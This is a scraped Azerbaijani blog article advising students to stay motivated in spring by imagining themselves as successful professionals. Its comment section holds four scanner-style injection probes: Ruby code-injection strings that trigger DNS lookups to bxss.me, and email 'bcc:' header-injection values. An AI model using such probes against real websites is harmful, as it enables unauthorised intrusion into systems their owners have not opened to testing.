Bizim tələbə qəlbimizin dərinliyində, pizza və yırtıq cinslərə olan sevgimizin altında təhsilə meyl var. Müəllimlərin və valideynlərin istədiyi qədər olmasa da, o var.
Bizim tələbə qəlbimizin dərinliyində, pizza və yırtıq cinslərə olan sevgimizin altında təhsilə meyl var. Müəllimlərin və valideynlərin istədiyi qədər olmasa da, o var. Qəmli payız axşamının səssizliyində onun sakit çağırışını eşidirik, lakin bahar gələndə... Həyəcanlı ürəyin döyüntüsü bizi yuxusuz gecələr keçirərək əldə edilən uğurlu nəticələri korlamamağa çağıran ağlın səsini batırır. Beləliklə:
Pul (qadjetlər, brend geyimlər) ikinci yerdə olanda
Bahar ilin yeganə fəslidir ki, tələbə (məktəbli) orqanizmi maddi motivasiyaya reaksiya verməyə bilər. Əksər hallarda təsirin bu növü effektli olur, lakin yazda onun davamlılığı “Açıq havada” gəzmək təklifi ilə gələn səmimi telefon zənginə qədərdir.
Baharın təsirindən daha effektli nəisə lazımdır. Bu, bizim ambisiyalarımızdır. İnsan məqsədi uğrunda, bizim vəziyyətimizdə isə yaxşı təhsil almaq uğrunda dağları dəlmək və okeanları üzüb keçmək bacarığına malikdir. Bunu necə etməli?
Mənim kimi, baharda rol oynamağı xoşlayırsınız?
Вalacaların hansısa peşə üzrə oynamağını yadınıza salın: onlar nəticəni görür, lakin o nəticəni əldə etmək üçün çətinlikləri görmür. Uğur üçün ən yaxşı şüar! Balaca sürücü oğlan yumru bir əşya götürür – o əmindir ki, əlindəki sükandır və getdik. Balaca həkim qız ağ xələt geyinib və qürurla “müalicəyə” başlayır. Bəs siz kim olmağı planlaşdırırsınız? Baharın gətirdiyi çətinliklərə qalib gəlmək üçün təhsil haqqında düşünmək lazım deyil, onun nəticələrini təsəvvür etmək lazımdır.
Həqiqi virtual reallıq!
Gördüyünüz kimi müvəfəqiyyətli mütəxəssis rolunu oynamaqla təhsili əyləncəyə çevirmək olar. Ən əsası: heç bir halda çarpayıda dərs hazırlamayın, bahara şans verməyin!
Comments (823)
Socket.gethostbyname("hitwz"+"wuffbhwj4ebcc.bxss.me.")[3].to_s)+"
Socket.gethostbyname('hitfm'+'qrwsjbmg80dce.bxss.me.')[3].to_s)+'
bcc:009365.1532-12730.1532.4c543.20004.2@bxss.me
bcc:009365.1532-12731.1532.4c543.20004.2@bxss.me